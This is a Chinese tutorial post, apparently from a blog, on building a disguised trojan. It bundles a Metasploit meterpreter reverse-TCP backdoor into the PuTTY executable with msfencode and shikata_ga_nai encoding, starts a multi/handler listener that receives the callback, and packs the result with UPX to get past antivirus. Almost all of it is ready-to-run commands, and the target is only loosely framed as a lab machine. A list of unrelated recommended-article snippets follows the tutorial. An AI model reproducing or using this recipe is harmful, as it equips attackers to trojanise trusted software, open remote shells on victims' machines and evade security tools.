社会工程学攻击案例-伪装木马

msfpayload 做后门程序

root@bt:~# mkdir /root/example_01
//生成目录,名称为example_01
//将putty软件拷贝到此目录下(可以在gns3安装目录下找到或者到网上下载,注意要英文版)
root@bt:~# cd /root/example_01/   //进入此文件夹
root@bt:~/example_01# msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.131 LPORT=80 R | msfencode -t exe -x /root/example_01/putty.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -c 5
//生成后门程序,并将后门捆绑到putty软件(其他软件也通用)
//管道符,将前面做好的指令传递给后面指令
root@bt:~/example_01# ll    //查看本目录下增加的带有后门的putty程序

将目录下的 putty_backdoor.exe 拷贝到靶机。

启动监听程序。

root@bt:/pentest/exploits/framework2# /opt/framework/msf3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.131 LPORT=80 Emsf > use exploit/multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 10.10.10.131
msf  exploit(handler) > set LPORT 80
msf  exploit(handler) > exploit

在靶机上安装杀毒软件,发现部分杀毒软件可以识别后台木马。通过 UPX 来实现加强免杀。

root@bt:~/example_01# upx -6 -o putty_backdoor_upx6.exe putty_backdoor.exe

将 putty_backdoor_upx6 软件放在靶机上,再次测试杀毒。

社会工程学攻击案例-伪装木马相关推荐

  1. 社会工程学攻击案例-邮件钓鱼

    社会工程学攻击案例-邮件钓鱼 BT5实现 root@bt:~# cd /pentest/exploits/set root@bt:/pentest/exploits/set# ./set Select ...

  2. 2008社工新书《黑客社会工程学攻击》

    保留一份以免淡忘了.     这本书写的非常的好,对于想深入了解这门艺术的人看是个不错的选择. --------------部分目录------------------------ 第一章.黑客时代的 ...

  3. 什么是社会工程学?如何防范社会工程学攻击

    黑客技术就像魔术,处处充满了欺骗. 不要沉迷于网络技术,人才是突破信息系统的关键. 只要敢做就能赢. 在电影<我是谁:没有绝对安全的系统>中,主角本杰明充分利用自己高超的黑客技术,非法入侵 ...

  4. 揭秘6种最有效的社会工程学攻击手段及防御之策

    本文讲的是揭秘6种最有效的社会工程学攻击手段及防御之策, 世界第一黑客凯文•米特尼克在<欺骗的艺术>中曾提到,人为因素才是安全的软肋.很多公司在信息安全上投入重金,最终导致数据泄露的原因却 ...

  5. 社会工程学攻击经典方法总结

    社会工程学(Social Engineering)是一种通过对受害者心理弱点.本能反应.好奇心.信任.贪婪等心理陷阱进行诸如欺骗.伤害等危害手段.社会工程学攻击在近年来的一些网络安全事件中起到了很大的 ...

  6. 通过社交媒体针对安全研究人员的社会工程学攻击活动

    2020年下半年至2021年初,谷歌威胁分析小组发现并确定了一个持续针对网络和漏洞安全研究人员的攻击活动,这些研究人员在不同的公司和组织中从事漏洞研究和开发. 谷歌认为这项攻击运动的发起者来自朝鲜网军 ...

  7. 黑客社会工程学攻击的八种常用伎俩

    著名黑客Kevin Mitnick在上世纪90年代让"黑客社会工程学"这个术语流行了起来,不过这 个简单的概念本身(引诱某人去做某事,或者泄露敏感信息)却早有年头了. 专家们认为, ...

  8. 渗透测试--3.1.社会工程学攻击

    目录 社会工程学攻击 SET介绍 一.建立克隆钓鱼网站收集目标凭证 二.set工具集之木马欺骗实战反弹链接 三.后渗透阶段 1.查看主机系统信息 2.到处用户密码的hash值 3.获得shell控制台 ...

  9. 黑客社会工程学攻击2 新书来袭

    黑客社会工程学攻击2 黑手不出,谁与争锋!阔别4年,社工尸再现江湖. 2008年 <黑客社会工程学攻击>上市,它是当时国内第一本"社工尸"图书,启智中国式社工黑商.荣获 ...

最新文章

  1. PHP APC(可选PHP缓存)
  2. 莫慌!网络推广平台更新网站SEO优化中,被K降权怎么办?
  3. Eclipse 中隐藏的 5 个非常有用的功能
  4. JCP执行委员会新成员选举结果揭晓:Hologic未获通过
  5. LeetCode 565. 数组嵌套
  6. 第一章 计算机网络 3 标准化工作和相关组织 [计算机网络笔记] -简单浏览了解即可
  7. P1618 三连击(升级版)-- python3实现
  8. 斯坦福机器学习公开课笔记--神经网络的学习
  9. Ray Dalio:经济机器是怎样运行的 (时长30分钟) 薛兆丰经济学讲义
  10. html插入图片在古诗右侧,古诗词配插图
  11. Matlab 7 win7安装步骤
  12. dbf shp shx sbn sbx mdb adf等类型的文件的解释
  13. SpringCloud入门实例
  14. 素材要VIP咋整?看python大展神通
  15. P6225 [eJOI2019] 异或橙子
  16. Android下的串口开发
  17. 每日一招:什么样的股票才能越跌越买
  18. linux aria2 参数,aria2常用命令
  19. java判断是否安装了pdf_java判断上传文件是否为pdf java图像上传中如何判断是否是jpg格式...
  20. Jetson AGX xavier测试六叶树Usb转Can卡通信记录笔记

热门文章

  1. 如何恢复win10小便签中误删的重要信息
  2. Ubuntu18.04下双网卡内外网设置
  3. Python 爬取中国大学 MOOC 课程
  4. c语言航班信息查询系统 程序,航班查询系统C语言源程序.doc
  5. 榆熙电商:如何保证店铺头像和风格的统一?
  6. 景安服务器密码修改,[景安网络]提示页
  7. 石英晶体谐振器主要参数
  8. 英语学习单词篇(19)
  9. 百家讲坛-《人类的起源》 吴新智
  10. 数字射线检测图像质量